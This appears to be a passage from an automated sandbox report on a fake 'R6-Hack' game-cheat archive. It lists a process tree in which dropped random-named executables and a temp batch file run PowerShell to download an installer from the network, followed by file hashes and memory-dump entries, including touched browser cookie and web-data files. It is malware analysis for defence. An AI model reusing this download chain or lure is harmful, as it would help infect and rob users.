C:\Users\Admin\AppData\Roaming\deskhi2w.gqd3.exe
"C:\Users\Admin\AppData\Roaming\deskhi2w.gqd3.exe"
3⤵
PID:2136

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2E3A.tmp\2E3B.tmp\2E3C.bat C:\Users\Admin\AppData\Roaming\deskhi2w.gqd3.exe"
4⤵
PID:2020

C:\Windows\system32\where.exe
where node
5⤵
PID:2820

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"
5⤵
- Command and Scripting Interpreter: PowerShell
PID:2264

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:3076

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\R6-Hack-main\R6-Hack-main\README.md
2⤵
PID:5028

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
PID:4464

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xdc,0x108,0x7ff97051ab58,0x7ff97051ab68,0x7ff97051ab78
2⤵
PID:4036

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1668 --field-trial-handle=1864,i,12684305154986823408,7899233679712441875,131072 /prefetch:2
2⤵
PID:1256

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1884 --field-trial-handle=1864,i,12684305154986823408,7899233679712441875,131072 /prefetch:8
2⤵
PID:2500

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2032 --field-trial-handle=1864,i,12684305154986823408,7899233679712441875,131072 /prefetch:8
2⤵
PID:5904

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2920 --field-trial-handle=1864,i,12684305154986823408,7899233679712441875,131072 /prefetch:1
2⤵
PID:4604

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2928 --field-trial-handle=1864,i,12684305154986823408,7899233679712441875,131072 /prefetch:1
2⤵
PID:1340

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4408 --field-trial-handle=1864,i,12684305154986823408,7899233679712441875,131072 /prefetch:1
2⤵
PID:4408

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4536 --field-trial-handle=1864,i,12684305154986823408,7899233679712441875,131072 /prefetch:8
2⤵
PID:856

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4692 --field-trial-handle=1864,i,12684305154986823408,7899233679712441875,131072 /prefetch:8
2⤵
PID:4744

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:5636

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\6ee1e48c-24eb-4d9a-895c-df6488c804ce.tmp
Filesize
97KB

MD5
715079ea3b4fcd1bb83cce9850e5a048

SHA1
a1dcbdc75a6bc924e1c75625cf5858f9f3677f7a

SHA256
b26379397ce0b586ca04f7c89e6e7504a69dc9818f0b8e9a01aa20da02aa393b

SHA512
c458ec6940511158dccd6a735683e419cd0c9933a26b2001ae2ae36dc659cbc2ae5ff1981145252c783bc204463c96ec9d1be1f7b5257869734d42bfdfbf6866

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
Filesize
40B

MD5
a85e5add31f209ed527bf82ac0768582

SHA1
9551a7f1878b70b64d4ed23aa8f5d69cc6f272b9

SHA256
9b28265c7c93e93355a28432984cef0ab471397329c2924745ff139d2a585c43

SHA512
4e216dc0fb62569a58c05a34e91658cf481db11e2d27589f1cc556ed2e986bf6d999a51dd35a6cc98c59be97f9f64df3ff084bdd8b8f1739f4589e7c47e11bbc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\440e825b-c296-4ebd-87eb-a9f96704b0d2.tmp
Filesize
7KB

MD5
a98bb4e7c0883377be47399be14e37c2

SHA1
94180ad1dc013c4e998680cad3d7db87af9e2261

SHA256
0806d19f9fe2689cde829f8694c5d03f3df34fedcc850ff2fc935657017e0498

SHA512
a9e9c481469acee1dcb1ce7b1c02f289c971970ea8067daf9d8c9c02592ada12ed154248b6a315502ac216aab8afc5d267e89d24b373b82f84122039fa1715d9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
2KB

MD5
364401d74f45e1706a977c0991fe61ab

SHA1
ed7c489064b1989ac98457e391fe44136e81f643

SHA256
dc60d89f55f2f1b9f4b17bebd3c301278dc0f6cd54e2147573a072cf0fb14813

SHA512
bed8ff43bd26b8c54806318e6d34be861013d45d29617bb1e45940cce3634bdb3c273782b9b7e533e573ac8a1cb8dc9714d91c8c4489e13eb867e079b9c0fc0a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Filesize
20KB

MD5
7ea3002d9502db36024f43a9e6e7cc47

SHA1
0d47c6f05d458fae0b1be025046b3b67319f1481

SHA256
ecfc2a8c022b86d7f8dc096e957ed0d5f0138081d445699a49db333d45ee8796

SHA512
1fbd5995f7c4cfb8e139e9640cee4ca6ddc26a24a34cdd90a056674ccb72707950ad7a5b6fde919f4fbeb78635fb60bdada8b692258a149ac44c029390e1c3ee

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
Filesize
356B

MD5
adea51f4a2d849748d7a6527301df2c8

SHA1
e34363b25d7d4421107f9313839c8b84271183ab

SHA256
a2fb4a6a415b8bdd0af79cf4c6d2b9c63642c319efcfdd29ddc48e6c79ad08d3

SHA512
15a513eaea3d2760dfc748a5af6a2ef079797ebcb4edebaa5efbbcfded301da9c25f9a7c5d7e0633fec550c4b66328cb6c14916b2b9483678c5859698bdb26f8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
Filesize
1KB

MD5
fcfb37419858af5d7687644587c725c1

SHA1
069a0afcfc23e25bb2e4f0101dbcba2ce8a7faf5

SHA256
cc56cb2297559cd2f60170e88421f794da9a18022679d8a6e7466d8ccb4db77b

SHA512
589e807924eea8ff80f1607c12f52d0a16ef69d27d8a9d14f41d0b141f4ade2e302783f1bc9c7a715c098d6858d3bbbc18b80e8f3aa880fcae93a2aa33a9429e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
Filesize
1KB

MD5
0c39adbd9de8550d4f9ce0af8e5e5b95

SHA1
f6793d49e352258b15156b88845e5b529fc0d09f

SHA256
cd81171de36f466905e9cefeadfce914aabca82ffb925e075481e94a8081df95

SHA512
b4d0cbc18bfc997637edadf0ca580889fdf549de87a29e671dda17ef08c10b10cb50b8d869d4aaf88f2bd1c906b99c72f1f5ebb2acf5cabd6a0b0d49610b655f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
6KB

MD5
306ba98c11a70b07e88fc7e786111c34

SHA1
d22a4e72a78c47f137a96df69e6e32988b00ff95

SHA256
aa78fb9f2527d12463c8d2fc5bd5fb7037fa2d95f8185963ea094b0d0c405830

SHA512
1af8123c965214be43164a7275d132719657f0b4a485486e5594bcb9948ac27429fef5c43430514264bcabc489dde6e96ee676cb3c8dcb20928facc172c7534e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
7KB

MD5
5096de075b1bc47b1e79b937028bdf2a

SHA1
9d26b8ef63196e4aa893bed65afc4248c6a9b612

SHA256
f5c0fabba13d50cb88020199b555c97f7be029075167c72ef6411c85907daf47

SHA512
5b32dd1a4a2457d0cc41dc07339145461d8cab6e0db09de44ee139c94147eba7afa92f89f59c0c78e0b126bdc0b00b031a96075ef7eb2d79a5f31d0c732ea7b2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Filesize
16KB

MD5
9c0f942a2763c709708d326b55fba4b4

SHA1
7e2054881c50003d6241499831e1ab4c7a32268d

SHA256
1fdb6ed80f331bd9f5008f31f7cc6b8aca582c773088c2ea70bc06df6526e6cb

SHA512
6ba4aa4adebda5c37e7ce6c86cb235e80191591b0245cfc41595e9e2a3f13df1bb07cc391b7145f53d84e2b650a71a977c24dffcc71cfe29ed0632046e5bbb68

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Data
Filesize
100KB

MD5
e43d6ed2228cfa085684ddc2183d622e

SHA1
29fd0aa1c0f0f4debae405396fa539fa3b6c3e9a

SHA256
4f65d21f38346baee8b3c6b762b0410665b01c30a9e20f70e67b5920e6be41aa

SHA512
b14e2ab1c334013fc4f194720b2fdf454332ecba2245129b9c8469a61b7f0c42e23ed4a1c931d7e3d7ad967dd249e7ca2ecc5c59e9485372b82a1b57dafc9a55

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
279KB

MD5
731784e20c89956b56df45e908905e9e

SHA1
42a44d775cdb7e8a6caab030e9bd9679d49cd2d4

SHA256
f4e0cf55dc422330212e571db45a517998dba9f1ea1afd8aa001982071ba4d98

SHA512
654d598fe4699c4f15bb377295e1c4f7e460c53f3aa49e2c13382f7d0a3ee6a1b32870d605719bef4248b54913e263ebd80fa743318b98a3b0f776831862203a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe580f3d.TMP
Filesize
88KB

MD5
84f1a548a732a7a92da1f0a9fd3780fa

SHA1
ed480a766cdd03f78f06aa90cc3823b74391ba4b

SHA256
19c973254bfb32dbca4858ac1f1eaeb734e3fee9f2228a8c93f90b72cbdef93d

SHA512
64064ea39f159c7311474aad0e79107c60831fe5cf31fc69e62fbfd8c1b54086de5c4bc08dbca0e3e6a2cb6187b15e10638df9ede9d0447c7fb812fa41fd4aa4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\r6s.exe.log
Filesize
226B

MD5
28d7fcc2b910da5e67ebb99451a5f598

SHA1
a5bf77a53eda1208f4f37d09d82da0b9915a6747

SHA256
2391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c

SHA512
2d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ivzz1ktx.gzg1.exe.log
Filesize
2KB

MD5
40d8df581623cc1d4d047bed647ef157

SHA1
a2447837d7343858b8466a3574c6262fd9e59752

SHA256
c3eac0ab5ac762166c15fa45bae691a7054d65eb487dff97486953f63b5d52c3

SHA512
78167efea7e2d9ab80df2217bc1f36c2c29e8cbc77b98afe962b34efcecd7ef08bc414e49bfa4b1503f00022d5583949ddd4514aeaa7dfe556b520606f7f0ec5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
f2e30151509f364ae1085421d24bf9af

SHA1
4e4a88ae22ab35f6c2f4f77290a0a002b8d00725

SHA256
df656713b675f79733ccf8f241276960f6b7bdbef932a87a49e397647a96d552

SHA512
56df18258531daf6163c4ece297b52df49272ec40fe50f525f4f626f5976e34c740c1fe02e0ff8025ef70dd00d8e1e834bd2acf1edeb5c61fe7f2920aa5d281c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
a052fbd774378345482b627cc8093270

SHA1
afe050f0c2f5a2231f6b1100180ed14166507c43

SHA256
75ecd631672c906ae9a03bf1f7d9bf5bbe725f5f114394d49e6d1cd9ed3e3ca2

SHA512
39014ea93fde476a2e37f1864e7acf7ffc5dbe7ebab927f661cd4624e05d2393e33715c69b91636d9cd1c45d20a65782537b80f2dc0a1493e53e550ae4c2dc8d

Download Submit
C:\Users\Admin\AppData\Local\Temp\7133.tmp\7134.tmp\7135.bat
Filesize
1KB

MD5
2b49f09f8e1785bf2e5c79d0f2bc7389

SHA1
05d68482ab1db17e11fef25fae270c3b784000ae

SHA256
706536e5077fcb4e5e4dd2f77d40f492e7ab6b12065cdc0b450fdd483f436279

SHA512
ba8cc161086caa5beb691191ff10f1408e68be79a075d0a653716df497cec762b7767783a0dc91bcba2f260df0fa9ff77e9cf982a364135a18c281e50564bc0a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_c2k22zni.hev.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsy7403.tmp\System.dll
Filesize
12KB

MD5
0d7ad4f45dc6f5aa87f606d0331c6901

SHA1
48df0911f0484cbe2a8cdd5362140b63c41ee457

SHA256
3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca

SHA512
c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpAEFB.tmp
Filesize
46KB

MD5
8f5942354d3809f865f9767eddf51314

SHA1
20be11c0d42fc0cef53931ea9152b55082d1a11e

SHA256
776ecf8411b1b0167bea724409ac9d3f8479973df223ecc6e60e3302b3b2b8ea

SHA512
fde8dfae8a862cf106b0cb55e02d73e4e4c0527c744c20886681245c8160287f722612a6de9d0046ed1156b1771229c8950b9ac036b39c988d75aa20b7bac218

Download Submit
C:\Users\Admin\AppData\Roaming\xirquh4o.icu1.exe
Filesize
407KB

MD5
cee45150af795124c072ddf8ab9eee0e

SHA1
e9aa7a4a845146cabea2f66ddbf58edc387d502a

SHA256
92fc9b2fcfb1939a5d150c932e47a5c27da9f752284b13aa5075fd430f8e28d3

SHA512
9b52a256511e680827936629ee00c05a1ce20b7365a16ee61c1e6e970a6033535354152953b14e8e4fed084ac1cf991752dcaa4c8e3b0a083e21762b11d61cc3

Download Submit
C:\Users\Admin\AppData\Roaming\xirquh4o.icu2.exe
Filesize
423KB

MD5
448e72d5b4a0ab039607cbaf93707732

SHA1
bbb85f7a6b8915d6a6739aa4f80be2766c62eb9f

SHA256
df97eb504ed5a3298737f83d418d70025f3be0daf56d6ccae35ec0d2ef813b20

SHA512
a4f82bb6385e1259e082128604e4232e2f0f3436d8fa8aa04ce3b0d42c943b8b3da4ffb74e307ba7243801b5b48ca07848cc8d029fc8a36cfb90e50ebaaba6a4

Download Submit
C:\Users\Admin\AppData\Roaming\xirquh4o.icu3.exe
Filesize
89KB

MD5
a3b2fcf0c05bb385115894d38c2e6c44

SHA1
32cf50911381bbec1dad6aec06c2a741bd5d8213

SHA256
dbfe02373aa15cc50414561f2bf486b69a11cd9cd50217608c1d18d17e72cae1

SHA512
fe58a5d238ac39a269897c176de08d0ad2726bb2ea1636f0d383a1484263e43d0878f0b5f4ebee8a10f3db8e72ab9b36b861e29a6a9b6429fa3e51ec7546dee2

Download Submit
C:\Users\Admin\Downloads\R6-Hack-main.zip.crdownload
Filesize
10.3MB

MD5
faba234bc92f7badff696e92958031fc

SHA1
605732ac272cb3496ace7515bf02566f901dd29d

SHA256
553e980d8aef3f48b9b932c6379534ef324e595f9755b9b86001fd87b903ad0b

SHA512
586143e61de38c1b5c691b665417c1f65eaf44ecd9263ec57f25c03a859bfb8675938b6b381b9535103e18338f4d28562cecadb428a8bb26e783e77a2565899e

Download Submit
\??\pipe\crashpad_4868_WHWJHUPAQATWKYRZ
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/60-531-0x0000000003C50000-0x0000000004050000-memory.dmp

Filesize
4.0MB

Download
memory/60-538-0x00007FF98DEB0000-0x00007FF98E0A5000-memory.dmp

Filesize
2.0MB

Download
memory/60-560-0x0000000000A00000-0x0000000000A7E000-memory.dmp

Filesize
504KB

Download
memory/60-467-0x0000000000A00000-0x0000000000A7E000-memory.dmp

Filesize
504KB

Download
memory/60-530-0x0000000003C50000-0x0000000004050000-memory.dmp

Filesize
4.0MB

Download
memory/60-540-0x00000000750F0000-0x0000000075305000-memory.dmp

Filesize
2.1MB

Download
memory/2140-595-0x0000000008CE0000-0x0000000008D56000-memory.dmp

Filesize
472KB

Download
memory/2140-596-0x0000000008C90000-0x0000000008CAE000-memory.dmp

Filesize
120KB

Download
memory/2140-600-0x00000000096B0000-0x0000000009872000-memory.dmp

Filesize
1.8MB

Download
memory/2140-601-0x0000000009DB0000-0x000000000A2DC000-memory.dmp

Filesize
5.2MB

Download
memory/2140-594-0x00000000089E0000-0x0000000008A46000-memory.dmp

Filesize
408KB

Download
memory/2140-581-0x0000000007B80000-0x0000000007C8A000-memory.dmp

Filesize
1.0MB

Download
memory/2140-582-0x0000000007AC0000-0x0000000007AD2000-memory.dmp

Filesize
72KB

Download
memory/2140-584-0x0000000007C90000-0x0000000007CDC000-memory.dmp

Filesize
304KB

Download
memory/2140-583-0x0000000007B20000-0x0000000007B5C000-memory.dmp

Filesize
240KB

Download
memory/2188-398-0x0000020BB7060000-0x0000020BB7082000-memory.dmp

Filesize
136KB

Download
memory/3280-387-0x00007FF96AC93000-0x00007FF96AC95000-memory.dmp

Filesize
8KB

Download
memory/3280-386-0x0000000000B50000-0x0000000000B58000-memory.dmp

Filesize
32KB

Download
memory/3448-825-0x00000000006E0000-0x000000000075E000-memory.dmp

Filesize
504KB

Download
memory/3448-868-0x00000000006E0000-0x000000000075E000-memory.dmp

Filesize
504KB

Download
memory/3448-867-0x0000000003730000-0x0000000003B30000-memory.dmp

Filesize
4.0MB

Download
memory/3560-533-0x0000000003BE0000-0x0000000003FE0000-memory.dmp

Filesize
4.0MB

Download
memory/3560-534-0x00007FF98DEB0000-0x00007FF98E0A5000-memory.dmp

Filesize
2.0MB

Download
memory/3560-545-0x0000000000DD0000-0x0000000000E4E000-memory.dmp

Filesize
504KB

Download
memory/3560-497-0x0000000000DD0000-0x0000000000E4E000-memory.dmp

Filesize
504KB

Download
memory/3560-536-0x00000000750F0000-0x0000000075305000-memory.dmp

Filesize
2.1MB

Download
memory/4604-940-0x0000000003A70000-0x0000000003E70000-memory.dmp

Filesize
4.0MB

Download
memory/4604-918-0x0000000000620000-0x000000000069E000-memory.dmp

Filesize
504KB

Download
memory/4604-941-0x0000000000620000-0x000000000069E000-memory.dmp

Filesize
504KB

Download
memory/4616-546-0x00007FF98DEB0000-0x00007FF98E0A5000-memory.dmp

Filesize
2.0MB

Download
memory/4616-543-0x0000000002AF0000-0x0000000002EF0000-memory.dmp

Filesize
4.0MB

Download
memory/4616-548-0x00000000750F0000-0x0000000075305000-memory.dmp

Filesize
2.1MB

Download
memory/4616-537-0x0000000001000000-0x0000000001009000-memory.dmp

Filesize
36KB

Download
memory/4676-517-0x0000000005230000-0x00000000057D4000-memory.dmp

Filesize
5.6MB

Download
memory/4676-507-0x0000000000050000-0x00000000000BA000-memory.dmp

Filesize
424KB

Download
memory/4676-516-0x0000000004910000-0x000000000492E000-memory.dmp

Filesize
120KB

Download
memory/4676-518-0x0000000004D70000-0x0000000004E02000-memory.dmp

Filesize
584KB

Download
memory/4676-580-0x0000000007F60000-0x0000000008578000-memory.dmp

Filesize
6.1MB

Download
memory/4676-519-0x0000000004D50000-0x0000000004D5A000-memory.dmp

Filesize
40KB

Download
memory/5036-550-0x0000000002520000-0x0000000002920000-memory.dmp

Filesize
4.0MB

Download
memory/5348-759-0x00000000002F0000-0x000000000036E000-memory.dmp

Filesize
504KB

Download
memory/5348-814-0x0000000003660000-0x0000000003A60000-memory.dmp

Filesize
4.0MB

Download
memory/5348-821-0x00000000002F0000-0x000000000036E000-memory.dmp

Filesize
504KB

Download
memory/5704-729-0x0000000003EF0000-0x00000000042F0000-memory.dmp

Filesize
4.0MB

Download
memory/5704-736-0x00000000007D0000-0x000000000084E000-memory.dmp

Filesize
504KB

Download
memory/5704-689-0x00000000007D0000-0x000000000084E000-memory.dmp

Filesize
504KB

Download